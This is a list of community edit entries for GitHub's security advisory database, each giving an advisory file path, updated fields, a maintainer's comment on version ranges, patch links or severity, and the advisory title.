github/advisory-database

advisories/github-reviewed/2021/08/GHSA-f3fg-5j9p-vchc/GHSA-f3fg-5j9p-vchc.json
**Updates**
**Comments**
Make the affected product versions SemVer compliant and match the actual package version: https://crates.io/crates/pleaser/0.4.0
=> [GHSA-f3fg-5j9p-vchc] File exposure in pleaser

advisories/github-reviewed/2022/12/GHSA-j8x2-2m5w-j939/GHSA-j8x2-2m5w-j939.json
=> [GHSA-j8x2-2m5w-j939] Amazon CloudWatch Agent for Windows has Privilege Escalation Vector

advisories/github-reviewed/2021/09/GHSA-hv5f-73mr-7vvj/GHSA-hv5f-73mr-7vvj.json
=> [GHSA-hv5f-73mr-7vvj] Cross-site Scripting in Mattermost

advisories/github-reviewed/2022/10/GHSA-vp68-2wrm-69qm/GHSA-vp68-2wrm-69qm.json
=> [GHSA-vp68-2wrm-69qm] matrix-sdk-crypto contains potential impersonation via room key forward responses

advisories/github-reviewed/2021/08/GHSA-vc5p-j8vw-mc6x/GHSA-vc5p-j8vw-mc6x.json
=> [GHSA-vc5p-j8vw-mc6x] Permissions bypass in pleaser

advisories/github-reviewed/2022/02/GHSA-g622-r636-qfqh/GHSA-g622-r636-qfqh.json
=> [GHSA-g622-r636-qfqh] SQL Injection in Couchbase Sync Gateway

advisories/github-reviewed/2021/11/GHSA-g5gj-9ggf-9vmq/GHSA-g5gj-9ggf-9vmq.json
=> [GHSA-g5gj-9ggf-9vmq] Infinite certificate chain depth results in OctoRPKI running forever

advisories/github-reviewed/2020/09/GHSA-cr56-66mx-293v/GHSA-cr56-66mx-293v.json
**Updates**
- References
**Comments**
Adding patch link for v2.2.0: https://github.com/nhn/tui.editor/commit/5f62f5eeda9e8f8bcf2075e8e0e10d22bf56d1a7
Adding the complete commit patch merge of the original pull (https://github.com/nhn/tui.editor/pull/1010)
=> [GHSA-cr56-66mx-293v] Cross-Site Scripting in @toast-ui/editor

advisories/github-reviewed/2022/05/GHSA-cqmr-rcpr-cxh3/GHSA-cqmr-rcpr-cxh3.json
**Updates**
- References
**Comments**
Adding patch link for v2.6.19: https://github.com/ansible/ansible/commit/4b5aed4e5af4c7aab621662f50a289e99b8ac393
Adding patch link for v2.7.13: https://github.com/ansible/ansible/commit/d728127310b4f3a40ce8b9df3affb88ffaeea073
Adding patch link for v2.8.4: https://github.com/ansible/ansible/commit/d39488ece44956f6a169a498b067bbef54552be1
CVE is in the commit message: "fixes CVE-2019-10206"
=> [GHSA-cqmr-rcpr-cxh3] Ansible password prompts could expose passwords

advisories/github-reviewed/2022/05/GHSA-42gq-h7xj-33r4/GHSA-42gq-h7xj-33r4.json
**Updates**
**Comments**
add source code for this pkg
=> [GHSA-42gq-h7xj-33r4] Features file injection vulnerability

advisories/github-reviewed/2021/05/GHSA-rwxp-hwwf-653v/GHSA-rwxp-hwwf-653v.json
**Updates**
**Comments**
add source code at github.com/TryGhost/express-hbs
=> [GHSA-rwxp-hwwf-653v] Insecure template handling in express-hbs

advisories/github-reviewed/2023/03/GHSA-6cpg-gqgq-2rrr/GHSA-6cpg-gqgq-2rrr.json
**Updates**
**Comments**
fix affected package versions
=> [GHSA-6cpg-gqgq-2rrr] phpMyFAQ Code Injection vulnerability

advisories/github-reviewed/2023/03/GHSA-2wcr-87wf-cf9j/GHSA-2wcr-87wf-cf9j.json
**Updates**
- References
**Comments**
pypi package is just "kiwitcms"
also added reference:
https://pypi.org/project/kiwitcms/
=> [GHSA-2wcr-87wf-cf9j] Kiwi TCMS Stored Cross-site Scripting via SVG file

advisories/github-reviewed/2021/08/GHSA-j8qq-58cr-8cc7/GHSA-j8qq-58cr-8cc7.json
**Updates**
- References
**Comments**
Adding the patch link for v0.1.1: https://github.com/Enet4/bra-rs/commit/aabf5562f8c6374ab30f615b28e0cff9b5c79e5f
The commit patch was referenced as closing the original issue 1 (https://github.com/Enet4/bra-rs/issues/1)
=> [GHSA-j8qq-58cr-8cc7] Out of bounds read in bra

advisories/github-reviewed/2022/02/GHSA-m6q5-wv4x-fv6h/GHSA-m6q5-wv4x-fv6h.json
**Updates**
- References
**Comments**
Adding the patch link for v8.8.10: https://github.com/drupal/core/commit/d4be028d81fb6b067513d788b60c3e6fc8fbd0a2
Adding the patch link for v8.9.6: https://github.com/drupal/core/commit/3184fa4b2f3b65b44884b5e858cdc7794d34b4c8
Adding the patch link for v9.0.6: https://github.com/drupal/core/commit/58330ba58d1ac6f1a0a549e8dbde8a3e094bf4fb
The commit patch message matches the original issue link id sa-core-2020-009 (https://www.drupal.org/sa-core-2020-009): "SA-CORE-2020-009 by..."
=> [GHSA-m6q5-wv4x-fv6h] Cross-site Scripting in Drupal Core

advisories/github-reviewed/2022/11/GHSA-h6q3-vv32-2cq5/GHSA-h6q3-vv32-2cq5.json
**Updates**
**Comments**
the module, "tflite", is within tensorflow not a individual package.
=> [GHSA-h6q3-vv32-2cq5] Buffer overflow in `CONV_3D_TRANSPOSE` on TFLite

advisories/github-reviewed/2023/04/GHSA-f8vr-r385-rh5r/GHSA-f8vr-r385-rh5r.json
**Updates**
**Comments**
https://github.com/hyperium/hyper/issues/2877#issuecomment-1507135950
=> [GHSA-f8vr-r385-rh5r] h2 vulnerable to denial of service

advisories/github-reviewed/2023/01/GHSA-5pm2-9mr2-3frq/GHSA-5pm2-9mr2-3frq.json
**Updates**
- Description
- References
**Comments**
See #2058. I missed the second package there.
=> [GHSA-5pm2-9mr2-3frq] Component takeover in Oracle Data Provider for .NET

advisories/github-reviewed/2022/11/GHSA-4vrc-q7m6-vq7w/GHSA-4vrc-q7m6-vq7w.json
**Updates**
- References
**Comments**
https://github.com/TaleLin/lin-cms-flask -- the python code repository of the package
=> [GHSA-4vrc-q7m6-vq7w] Lin CMS vulnerable to Improper Authentication

advisories/github-reviewed/2020/08/GHSA-p4pj-9g59-4ppv/GHSA-p4pj-9g59-4ppv.json
**Updates**
- References
**Comments**
Adding the patch link for v1.3.14/1.4.7/1.5.2/1.6.4: https://github.com/Sylius/SyliusResourceBundle/commit/73ed8b8bb083f36c30ad7c3cec336f65d6a80650
The GHSA-ID is in the commit patch message: "Merge pull request from GHSA-p4pj-9g59-4ppv. Sanitize request input before passing it to expression language evaluator"
=> [GHSA-p4pj-9g59-4ppv] Remote Code Execution in SyliusResourceBundle

advisories/github-reviewed/2022/12/GHSA-3vqj-43w4-2q58/GHSA-3vqj-43w4-2q58.json
**Updates**
**Comments**
Fixed for `org.json:json` in https://github.com/stleary/JSON-java/pull/720
=> [GHSA-3vqj-43w4-2q58] hutool-json stack overflow vulnerability

advisories/github-reviewed/2023/03/GHSA-2xpm-cmvw-3jcc/GHSA-2xpm-cmvw-3jcc.json
**Updates**
- CVSS
- References
**Comments**
Change reference links and update CVSS score
=> [GHSA-2xpm-cmvw-3jcc] Reflected XSS in Application Logger module

advisories/github-reviewed/2023/04/GHSA-f9xv-q969-pqx4/GHSA-f9xv-q969-pqx4.json
**Updates**
**Comments**
According to the author at https://huntr.dev/bounties/4b494e99-5a3e-40d9-8678-277f3060e96c this issue was only introduced with 2.0.0 and does not affect 1.x
=> [GHSA-f9xv-q969-pqx4] Uncaught Exception in yaml

README.md
See internal discussion on documenting GHSA IDs here: https://github.com/github/docs-content/issues/10072
=> Adding info on GHSA IDs

advisories/github-reviewed/2021/08/GHSA-qcc4-3rxf-gf4m/GHSA-qcc4-3rxf-gf4m.json
**Updates**
- References
**Comments**
Adding the patch link for v14.6.8: https://github.com/vaadin/flow-components/commit/1aa6bc94c763023bc3fc5849c2a1e8cab3bf6766
Adding the patch link for v20.0.6: https://github.com/vaadin/flow-components/commit/f136532a735f703f1144f19fee48c9009c659f03
These are the complete merge/backport of the originally linked pull 1903: "fix: allow changing checkboxgroup value if disabled checkbox value doesn't change (1903)"
=> [GHSA-qcc4-3rxf-gf4m] Unauthorized property update in CheckboxGroup component in Vaadin 12-14 and 15-20

advisories/github-reviewed/2023/03/GHSA-h76p-mc68-jv3p/GHSA-h76p-mc68-jv3p.json
**Updates**
**Comments**
Updated range from cve.org data at https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27901.json
=> [GHSA-h76p-mc68-jv3p] Denial of service in Jenkins Core

advisories/github-reviewed/2023/04/GHSA-4r6h-8v6p-xvw6/GHSA-4r6h-8v6p-xvw6.json
**Updates**
- Description
**Comments**
Fix typo in the package name in the description
=> [GHSA-4r6h-8v6p-xvw6] Prototype Pollution in sheetJS

advisories/github-reviewed/2023/03/GHSA-584m-7r4m-8j6v/GHSA-584m-7r4m-8j6v.json
**Updates**
**Comments**
Updating ranges based on cve.org version info from https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27903.json
=> [GHSA-584m-7r4m-8j6v] Incorrect Authorization in Jenkins Core

advisories/github-reviewed/2023/03/GHSA-rrgp-c2w8-6vg6/GHSA-rrgp-c2w8-6vg6.json
**Updates**
**Comments**
Updating ranges based on cve.org data from https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27904.json
=> [GHSA-rrgp-c2w8-6vg6]  Information disclosure through error stack traces related to agents 

advisories/github-reviewed/2023/03/GHSA-hf9h-vv4m-2f33/GHSA-hf9h-vv4m-2f33.json
**Updates**
**Comments**
Updated ranges based on cve.org data from https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27899.json
=> [GHSA-hf9h-vv4m-2f33] Incorrect Authorization in Jenkins Core

advisories/github-reviewed/2023/03/GHSA-frgr-c5f2-8qhh/GHSA-frgr-c5f2-8qhh.json
**Updates**
**Comments**
Updated versions based on cve.org data from https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27900.json
=> [GHSA-frgr-c5f2-8qhh] Denial of service in Jenkins Core

advisories/github-reviewed/2023/03/GHSA-cj6r-8pxj-5jv6/GHSA-cj6r-8pxj-5jv6.json
**Updates**
**Comments**
updated ranges based on cve.org data at https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27902.json
=> [GHSA-cj6r-8pxj-5jv6] Incorrect Permission Preservation in Jenkins Core

advisories/github-reviewed/2022/05/GHSA-ccr8-4xr7-cgj3/GHSA-ccr8-4xr7-cgj3.json
**Updates**
**Comments**
Add backports based on cve.org data from https://github.com/CVEProject/cvelist/blob/16860a328d970faa6e4350b0fa446f64a52e52ca/2020/2xxx/CVE-2020-2279.json
=> [GHSA-ccr8-4xr7-cgj3] Sandbox bypass vulnerability in Jenkins Script Security Plugin

advisories/github-reviewed/2022/05/GHSA-rf92-3vjr-w628/GHSA-rf92-3vjr-w628.json
**Updates**
**Comments**
Add backports based on cve.org data from https://github.com/CVEProject/cvelist/blob/16860a328d970faa6e4350b0fa446f64a52e52ca/2020/2xxx/CVE-2020-2299.json
=> [GHSA-rf92-3vjr-w628] Improper Authentication in Jenkins Active Directory Plugin

advisories/github-reviewed/2022/05/GHSA-8wcw-cw2f-h4g2/GHSA-8wcw-cw2f-h4g2.json
**Updates**
**Comments**
Adds backported fixes per additional cve.org data https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2300.json
=> [GHSA-8wcw-cw2f-h4g2] Improper Authentication (empty password) in Jenkins Active Directory Plugin

advisories/github-reviewed/2022/05/GHSA-954f-xw44-56r2/GHSA-954f-xw44-56r2.json
**Updates**
**Comments**
Adds backport per https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2301.json
=> [GHSA-954f-xw44-56r2] Authentication cache in Active Directory Jenkins Plugin allows logging in with any password

advisories/github-reviewed/2022/05/GHSA-x58r-wxc3-7pqr/GHSA-x58r-wxc3-7pqr.json
**Updates**
**Comments**
Add backports per https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2305.json
=> [GHSA-x58r-wxc3-7pqr] XXE vulnerability in Jenkins Mercurial Plugin

advisories/github-reviewed/2022/05/GHSA-vrrc-3wwh-frgx/GHSA-vrrc-3wwh-frgx.json
**Updates**
**Comments**
Add backports per https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2306.json
=> [GHSA-vrrc-3wwh-frgx] Missing Authorization in Jenkins Mercurial Plugin

advisories/github-reviewed/2022/05/GHSA-fh5w-p2j4-4p8x/GHSA-fh5w-p2j4-4p8x.json
**Updates**
**Comments**
Add backports per https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2307.json
=> [GHSA-fh5w-p2j4-4p8x] Exposure of Sensitive Information to an Unauthorized Actor in Jenkins Kubernetes Plugin

advisories/github-reviewed/2022/05/GHSA-rr6j-37cv-c7x7/GHSA-rr6j-37cv-c7x7.json
**Updates**
**Comments**
Add backports per https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2308.json
=> [GHSA-rr6j-37cv-c7x7] Missing Authorization in Jenkins Kubernetes Plugin

advisories/github-reviewed/2022/05/GHSA-g2r3-4g8q-h5rj/GHSA-g2r3-4g8q-h5rj.json
**Updates**
**Comments**
Add backports per https://github.com/CVEProject/cvelist/blob/381fe967666a5ce01625a7a050427aa4757e3ca6/2020/2xxx/CVE-2020-2309.json
=> [GHSA-g2r3-4g8q-h5rj] Missing authorization in Jenkins Kubernetes Plugin

advisories/github-reviewed/2022/02/GHSA-2m9w-9xh2-wxc3/GHSA-2m9w-9xh2-wxc3.json
**Updates**
**Comments**
Add fixes and backports per https://github.com/CVEProject/cvelist/blob/00bfb5abeecc9f553a2f42954ee540e493498ee9/2022/25xxx/CVE-2022-25179.json
=> [GHSA-2m9w-9xh2-wxc3] Link Following in Jenkins Pipeline Multibranch Plugin

advisories/github-reviewed/2021/06/GHSA-fvfc-8pqr-wjpv/GHSA-fvfc-8pqr-wjpv.json
**Updates**
**Comments**
Add backports from https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21650.json
=> [GHSA-fvfc-8pqr-wjpv] Missing Authorization in Jenkins S3 publisher Plugin

advisories/github-reviewed/2021/06/GHSA-w5rh-j4g3-jr29/GHSA-w5rh-j4g3-jr29.json
**Updates**
**Comments**
Add backports from https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21651.json
=> [GHSA-w5rh-j4g3-jr29] Missing Authorization in Jenkins S3 publisher Plugin

advisories/github-reviewed/2022/01/GHSA-rvh4-g2rj-hr9c/GHSA-rvh4-g2rj-hr9c.json
**Updates**
**Comments**
adds backports per https://github.com/CVEProject/cvelist/blob/36f932156733baab1b13868be4338de406a1dec7/2022/23xxx/CVE-2022-23107.json
=> [GHSA-rvh4-g2rj-hr9c] Path Traversal in Jenkins Warnings Next Generation Plugin

advisories/github-reviewed/2022/02/GHSA-4m7p-55jm-3vwv/GHSA-4m7p-55jm-3vwv.json
**Updates**
**Comments**
Add backports per https://github.com/CVEProject/cvelist/blob/3615f493b8a36ff15735fb9d79c9dc9e0d542695/2022/25xxx/CVE-2022-25173.json
=> [GHSA-4m7p-55jm-3vwv] Improper Neutralization of Special Elements used in an OS Command in Jenkins Pipeline: Groovy Plugin

advisories/github-reviewed/2022/02/GHSA-g9fx-6j5c-grmw/GHSA-g9fx-6j5c-grmw.json
**Updates**
**Comments**
add backports per https://github.com/CVEProject/cvelist/blob/3615f493b8a36ff15735fb9d79c9dc9e0d542695/2022/25xxx/CVE-2022-25174
=> [GHSA-g9fx-6j5c-grmw] Improper Neutralization of Special Elements used in an OS Command in Jenkins Pipeline: Shared Groovy Libraries Plugin

advisories/github-reviewed/2017/10/GHSA-fg9w-g6m4-557j/GHSA-fg9w-g6m4-557j.json
**Updates**
**Comments**
Change package name from rails to actionpack. New package name already mentioned in your references.
=> [GHSA-fg9w-g6m4-557j] Moderate severity vulnerability that affects rails

advisories/github-reviewed/2017/10/GHSA-24fg-p96v-hxh8/GHSA-24fg-p96v-hxh8.json
**Updates**
**Comments**
Change package name from rails to actionpack. New package name already mentioned in your references.
=> [GHSA-24fg-p96v-hxh8] rails Cross-Site Request Forgery vulnerability

advisories/github-reviewed/2022/04/GHSA-q58j-fmvf-9rq6/GHSA-q58j-fmvf-9rq6.json
**Updates**
**Comments**
Change package name from rails to actionpack. New package name already mentioned in your references.
=> [GHSA-q58j-fmvf-9rq6] Cross site scripting in rails

advisories/github-reviewed/2023/05/GHSA-hj3f-6gcp-jg8j/GHSA-hj3f-6gcp-jg8j.json
**Updates**
- CVSS
- Severity
**Comments**
Adding CVSS score from the original JVN report (https://jvn.jp/en/jp/JVN45127776/), lowering severity from "high" to "low"
=> [GHSA-hj3f-6gcp-jg8j] Open redirect in Tornado

advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json
**Updates**
- References
**Comments**
Added jQuery from the NuGet ecosystem
=> [GHSA-6c3j-c64m-qhgq] XSS in jQuery as used in Drupal, Backdrop CMS, and other products

advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json
**Updates**
**Comments**
Added jQuery from NuGet ecosystem
=> [GHSA-q4m3-2j7h-f7xw] Cross-Site Scripting in jquery

advisories/github-reviewed/2022/06/GHSA-j9m2-h2pv-wvph/GHSA-j9m2-h2pv-wvph.json
**Updates**
**Comments**
Added jQuery.Validation from NuGet ecosystem
=> [GHSA-j9m2-h2pv-wvph] Regular expression denial of service in jquery-validation

advisories/github-reviewed/2019/10/GHSA-c9cg-q8r2-xvjq/GHSA-c9cg-q8r2-xvjq.json
**Updates**
**Comments**
Corrected affected version range based on https://auth0.com/docs/secure/security-guidance/security-bulletins/cve-2019-16929
=> [GHSA-c9cg-q8r2-xvjq] Improper Authentication in Auth0.AuthenticationApi

advisories/github-reviewed/2021/02/GHSA-288c-cq4h-88gq/GHSA-288c-cq4h-88gq.json
**Updates**
**Comments**
this like the versions in nvd
https://nvd.nist.gov/vuln/detail/CVE-2020-25649
=> [GHSA-288c-cq4h-88gq] XML External Entity (XXE) Injection in Jackson Databind

advisories/github-reviewed/2022/02/GHSA-q234-x887-9rxh/GHSA-q234-x887-9rxh.json
**Updates**
**Comments**
backports per https://github.com/CVEProject/cvelist/blob/b78a29294777d7d73576d5574b4ba79a31e912bc/2022/25xxx/CVE-2022-25177.json
=> [GHSA-q234-x887-9rxh] Improper Link Resolution Before File Access in Jenkins Pipeline: Shared Groovy Libraries Plugin

advisories/github-reviewed/2022/02/GHSA-5hfv-mg5x-mv32/GHSA-5hfv-mg5x-mv32.json
**Updates**
**Comments**
backports per https://github.com/CVEProject/cvelist/blob/535c457d843e09483942bbd57304d36d31015fcd/2022/25xxx/CVE-2022-25178.json
=> [GHSA-5hfv-mg5x-mv32] Improper Limitation of a Pathname to a Restricted Directory in Jenkins Pipeline: Shared Groovy Libraries Plugin

advisories/github-reviewed/2020/09/GHSA-2pqj-h3vj-pqgw/GHSA-2pqj-h3vj-pqgw.json
**Updates**
- References
**Comments**
Added jQuery from the NuGet ecosystem
=> [GHSA-2pqj-h3vj-pqgw] Cross-Site Scripting in jquery

advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json
**Updates**
- References
**Comments**
Added jQuery from the NuGet ecosystem
=> [GHSA-579v-mp3v-rrw5] jQuery vulnerable to Cross-Site Scripting (XSS)

advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json
**Updates**
- References
**Comments**
Added jQuery from the NuGet ecosystem
=> [GHSA-jpcq-cgw6-v4j6] Potential XSS vulnerability in jQuery

advisories/github-reviewed/2023/05/GHSA-2c4m-59x9-fr2g/GHSA-2c4m-59x9-fr2g.json
**Updates**
**Comments**
Add patched version
https://github.com/gin-gonic/gin/releases/tag/v1.9.1
=> [GHSA-2c4m-59x9-fr2g] Gin Web Framework does not properly sanitize filename parameter of Context.FileAttachment function

advisories/github-reviewed/2023/04/GHSA-gx43-fqrx-6fcw/GHSA-gx43-fqrx-6fcw.json
**Updates**
- Summary
**Comments**
Remove leading whitespace from summary
=> [GHSA-gx43-fqrx-6fcw]  thorsten/phpmyfaq vulnerable to business logic errors

advisories/github-reviewed/2019/01/GHSA-f9hv-mg5h-xcw9/GHSA-f9hv-mg5h-xcw9.json
**Updates**
- Summary
**Comments**
Remove leading whitespace from summary
=> [GHSA-f9hv-mg5h-xcw9]  Deserialization of Untrusted Data in jackson-databind due to polymorphic deserialization

advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json
**Updates**
- Summary
**Comments**
Remove leading whitespace from summary
=> [GHSA-x2w5-5m2g-7h5m]  XML External Entity Reference (XXE) in jackson-databind

advisories/github-reviewed/2022/12/GHSA-8gh8-hqwg-xf34/GHSA-8gh8-hqwg-xf34.json
**Updates**
- CVSS
- References
- Severity
**Comments**
There's a PoC used in a CTF for this, the CVSS should be higher
CVSS calculation in - https://www.huntr.dev/bounties/1-npm-fast-json-patch/
CTF - https://blog.effectrenan.com/pwn2win-2021-illusion-web-challenge/
Modification of prototype behavior, which may result in Information Disclosure, Denial of Service, or even RCE.
=> [GHSA-8gh8-hqwg-xf34] Starcounter-Jack JSON-Patch Prototype Pollution vulnerability

advisories/github-reviewed/2021/08/GHSA-jq65-29v4-4x35/GHSA-jq65-29v4-4x35.json
**Updates**
**Comments**
Make the version SEMVER compliant.
=> [GHSA-jq65-29v4-4x35] Null pointer deference in openssl-src 

advisories/github-reviewed/2023/01/GHSA-3ppr-72x5-x67q/GHSA-3ppr-72x5-x67q.json
**Updates**
**Comments**
Vulnerability is fixed with version 1.0.1 according to release notes: https://github.com/jenkinsci/mstest-plugin/releases/tag/mstest-1.0.1
=> [GHSA-3ppr-72x5-x67q] XML external entity vulnerability on agents in Jenkins MSTest Plugin 

advisories/github-reviewed/2022/09/GHSA-j9fq-vwqv-2fm2/GHSA-j9fq-vwqv-2fm2.json
**Updates**
- Summary
**Comments**
Removed trailing space
=> [GHSA-j9fq-vwqv-2fm2] Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url 

advisories/github-reviewed/2023/01/GHSA-fhg7-m89q-25r3/GHSA-fhg7-m89q-25r3.json
**Updates**
- Summary
**Comments**
Removed trailing space
=> [GHSA-fhg7-m89q-25r3] ReDoS Vulnerability in ua-parser-js version 

advisories/github-reviewed/2023/06/GHSA-gc34-5v43-h7v8/GHSA-gc34-5v43-h7v8.json
**Updates**
- Description
**Comments**
The vulnerability was introduced in this commit and included in v3.4.0: https://github.com/nuxt/nuxt/blob/72ba53efbc2384f802d654fffd92eaf36a81b507/packages/nuxt/src/app/components/nuxt-root.vue
closes https://github.com/nuxt/nuxt/issues/21694
=> [GHSA-gc34-5v43-h7v8] nuxt Code Injection vulnerability

advisories/github-reviewed/2022/11/GHSA-22wj-vf5f-wrvj/GHSA-22wj-vf5f-wrvj.json
**Updates**
**Comments**
new h2 release contains https://github.com/h2database/h2database/pull/3833
=> [GHSA-22wj-vf5f-wrvj] Password exposure in H2 Database 

advisories/github-reviewed/2022/09/GHSA-fg25-gq9g-32mx/GHSA-fg25-gq9g-32mx.json
**Updates**
**Comments**
https://github.com/cloudreve/Cloudreve/releases/tag/3.6.0-beta1
https://github.com/cloudreve/Cloudreve/commit/4b85541d73949969f41ad46d1e00544c9f1a7538
=> [GHSA-fg25-gq9g-32mx] Cross site scripting in Cloudreve

advisories/github-reviewed/2023/07/GHSA-7x2c-fgx6-xf9h/GHSA-7x2c-fgx6-xf9h.json
**Updates**
- Summary
**Comments**
fix typo
=> [GHSA-7x2c-fgx6-xf9h] 1Panel vulnerable to ommand injection when entering the container terminal

advisories/github-reviewed/2023/04/GHSA-f737-3fh6-jf6w/GHSA-f737-3fh6-jf6w.json
**Updates**
**Comments**
https://github.com/Tencent/vConsole/commit/b91591703490e032451f7734212f6458bde9be6a
https://github.com/Tencent/vConsole/releases/tag/v3.15.1
=> [GHSA-f737-3fh6-jf6w] Prototype Pollution in vConsole

advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json
**Updates**
- Description
- References
**Comments**
Update impacted ranges again
=> [GHSA-c2qf-rxjj-qqgw] semver vulnerable to Regular Expression Denial of Service

advisories/github-reviewed/2023/07/GHSA-9hxf-ppjv-w6rq/GHSA-9hxf-ppjv-w6rq.json
**Updates**
**Comments**
The fix https://github.com/grpc/grpc/pull/32309 referenced in the description doesn't modify code used by the Dart implementation.
=> [GHSA-9hxf-ppjv-w6rq] gRPC connection termination issue

advisories/github-reviewed/2023/07/GHSA-cfgp-2977-2fmm/GHSA-cfgp-2977-2fmm.json
**Updates**
**Comments**
The fix https://github.com/grpc/grpc/pull/32309 referenced in the description doesn't touch any code used by the Dart grpc implementation.
=> [GHSA-cfgp-2977-2fmm] Connection confusion in gRPC

advisories/github-reviewed/2023/07/GHSA-9436-3gmp-4f53/GHSA-9436-3gmp-4f53.json
**Updates**
**Comments**
it'a PHP repository, not Go
=> [GHSA-9436-3gmp-4f53] grav Server-side Template Injection (SSTI) mitigation bypass

advisories/github-reviewed/2023/07/GHSA-m8fw-p3cr-6jqc/GHSA-m8fw-p3cr-6jqc.json
**Updates**
- Description
**Comments**
TYPO3 v12 was not affected, all other versions v9, v10, v11 are correct.
=> [GHSA-m8fw-p3cr-6jqc] Cross-Site Scripting in CKEditor4 WordCount Plugin

advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json
**Updates**
- CVSS
- CWEs
- Description
- References
- Severity
**Comments**
add CVE, CWE, CVSS and some additional description
=> [GHSA-pjwm-rvh2-c87w] Embedded malware in ua-parser-js

advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json
**Updates**
**Comments**
Update patched version for 1.x line
=> [GHSA-rfvw-5848-gxc5] Silverstripe Flash Clipboard Reflected XSS

advisories/github-reviewed/2023/03/GHSA-p8p7-x288-28g6/GHSA-p8p7-x288-28g6.json
**Updates**
**Comments**
Mark fork of `request` as vulnerable
=> [GHSA-p8p7-x288-28g6] Server-Side Request Forgery in Request

advisories/github-reviewed/2021/04/GHSA-rv39-3qh7-9v7w/GHSA-rv39-3qh7-9v7w.json
**Updates**
**Comments**
The description specifies "older unsupported versions", this adjusts the versions to capture all the old stuff too
=> [GHSA-rv39-3qh7-9v7w] Improper Input Validation in Spring Framework

advisories/github-reviewed/2022/05/GHSA-hr65-qq6p-87r4/GHSA-hr65-qq6p-87r4.json
**Updates**
**Comments**
This is a bug in the elasticsearch server, not the rest client
=> [GHSA-hr65-qq6p-87r4] Exposure of Sensitive Information to an Unauthorized Actor in Elasticsearch

advisories/github-reviewed/2023/03/GHSA-c6qg-cjj8-47qp/GHSA-c6qg-cjj8-47qp.json
**Updates**
- Summary
**Comments**
Use non-unicode apostrophe in title for better compatibility
=> [GHSA-c6qg-cjj8-47qp] Possible Denial of Service Vulnerability in Rack’s header parsing

advisories/github-reviewed/2023/01/GHSA-j6gc-792m-qgm2/GHSA-j6gc-792m-qgm2.json
**Updates**
- Summary
**Comments**
Use non-unicode apostrophe for better compatibility
=> [GHSA-j6gc-792m-qgm2] ReDoS based DoS vulnerability in Active Support’s underscore

advisories/github-reviewed/2023/01/GHSA-579w-22j4-4749/GHSA-579w-22j4-4749.json
**Updates**
- Description
- Summary
**Comments**
Use non-unicode apostrophe for better compatibility
=> [GHSA-579w-22j4-4749] Denial of Service Vulnerability in ActiveRecord’s PostgreSQL adapter

advisories/github-reviewed/2023/07/GHSA-69vw-3pcm-84rw/GHSA-69vw-3pcm-84rw.json
Based on the canonical version information from https://www.cve.org/CVERecord?id=CVE-2023-39151
=> Fix version range for CVE-2023-39151

advisories/github-reviewed/2022/05/GHSA-wm7h-9275-46v2/GHSA-wm7h-9275-46v2.json
**Updates**
- Description
**Comments**
I've fixed a typo and improved the wording.
=> [GHSA-wm7h-9275-46v2] Crash in HeaderParser in dicer

advisories/github-reviewed/2021/11/GHSA-vpfp-5gwq-g533/GHSA-vpfp-5gwq-g533.json
**Updates**
- References
**Comments**
Old fix commit appears to be completely unrelated to the actual fix.
=> [GHSA-vpfp-5gwq-g533] Improper Authentication in Apache ShenYu Admin

advisories/github-reviewed/2023/08/GHSA-rg2c-cfxv-qp6f/GHSA-rg2c-cfxv-qp6f.json
**Updates**
**Comments**
According NIST NVD this vuln should be of high severity
=> [GHSA-rg2c-cfxv-qp6f] Denial of service in jackson-dataformats-text

advisories/github-reviewed/2023/08/GHSA-cwvm-v4w8-q58c/GHSA-cwvm-v4w8-q58c.json
**Updates**
- CVSS
- CWEs
**Comments**
* CWE added
* CVSS assessment was fixed.
=> [GHSA-cwvm-v4w8-q58c] Blind local file inclusion

advisories/github-reviewed/2023/08/GHSA-9v85-q87q-g4vg/GHSA-9v85-q87q-g4vg.json
**Updates**
**Comments**
Origin GitHub issue has been marked as resolved by package author.
Reference patch commit: edb0d480733a44d28ff3d5e4e2779153ba645ce7 and 6de492385d72af044231c4163dff13a43d991c83
=> [GHSA-9v85-q87q-g4vg] Path traversal in Archive

advisories/github-reviewed/2022/05/GHSA-mm7g-f2gg-cw8g/GHSA-mm7g-f2gg-cw8g.json
**Updates**
**Comments**
https://nvd.nist.gov/vuln/detail/CVE-2017-1002102#range-4102882
https://github.com/kubernetes/kubernetes/issues/60814
=> [GHSA-mm7g-f2gg-cw8g] Kubernetes arbitrary file overwrite

